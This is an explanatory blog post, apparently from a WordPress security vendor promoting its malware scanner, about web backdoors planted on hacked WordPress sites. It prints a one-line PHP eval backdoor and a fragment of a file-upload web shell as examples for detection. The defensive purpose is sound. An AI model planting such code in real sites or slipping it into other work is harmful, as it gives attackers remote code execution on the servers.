What is a backdoor?
A so-called backdoor as a computer security term refers to a communication connection feature installed in a computer (without the knowledge of others) to allow unauthorized use of a computer feature that originally used IDs and passwords to verify usage rights.
Citation Wikipedia
It is defined as.
Recently, with the popularization of WordPress, anyone can now have a powerful information dissemination medium, and a type of backdoor known as a “web backdoor,” which is installed by tampering with the program on the server, has been confirmed on many customer sites and is now raging around the world. These backdoors have been found in many customer sites and are raging around the world.
Functions of WEB backdoors
The function of a web backdoor is a file that has the ability for hackers to place arbitrary files on the server or rewrite the contents of other files.
A hacker who has taken away administrator privileges can use the file export function of WordPress to install a backdoor on the server. Through the backdoor, the hacker can perform a variety of unauthorized activities.
Send out spam e-mails
Use the backdoor as a stepping stone to attack other sites
Forwarding access to a site to another site
Mining virtual currency
Attempting to improve search rankings by linking to some other site
Operating a fraudulent site on a server
or worse, may be involved in criminal activities.
Web backdoors are difficult to detect and eliminate.
Once a site has been hacked and a backdoor has been installed, it is not easy to find the code.
This is because WordPress typically contains over 5,000 files, including themes, plugins, etc., and it does not matter which of those files the hacker knows the location of the backdoor.
In addition, most backdoors do not disappear even if WordPress is updated later or plug-ins are updated. Once the malware is removed, the backdoor remains on the server, allowing hackers to place malicious files on the server again and again.
Examples of web backdoor code
Backdoor code is often extremely simple and short. As an example, it takes the following structure
@eval($_POST["code"]);
This code would be any program that a hacker could remotely send and run on the server, and would be obfuscated to make it difficult to detect.
In some cases, a form is installed directly on the server where files can be uploaded.
<form enctype="multipart/form-data" action="$self" method="POST"> <input type="hidden" name="ac" value="upload"> <tr> <input size="5" name="file" type="file"></td> </tr> <tr> <td><input size="10" value="$docr/" name="path" type="text"><input type=" submit" value="ОК"></td> $tend HTML; if (isset($_POST['path'])){ $uploadfile = $_POST['path']. $_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "File ". $_FILES['file']['name']. " uploaded"; } } else { print "Not working: info:\n"; } print_r($_FILES); } } } break; } }
This code was not obfuscated and was written in extremely plain code, making it difficult to detect as a backdoor, and it was difficult even for us to detect it unless we took the difference from the original WordPress file.
(We now understand the pattern of this backdoor and can detect it.)
Web backdoors are planted in small sites.
Do you think that your site is not so popular and can’t be hacked?
Do you think so?
This is a big mistake. Hackers automatically programmatically scan a vast amount of websites for security vulnerabilities and place defaced files on even the smallest, most neglected sites.
Reference Article
8 Characteristics of Websites that can be Hacked by WordPress
If you have the authority to do what you want on a server that someone else has signed up for, you can do it anonymously, and if the site is small or abandoned, you can easily imagine the time it will take to find out about it and the technical difficulties in eliminating malware.
Please consult with WordPress Doctor for security measures for small sites, WordPress updates, and malware elimination.
Here is a scanner that WordPress Doctor has released that can detect web backdoors
WordPress Doctor: Malware Scanning Plugin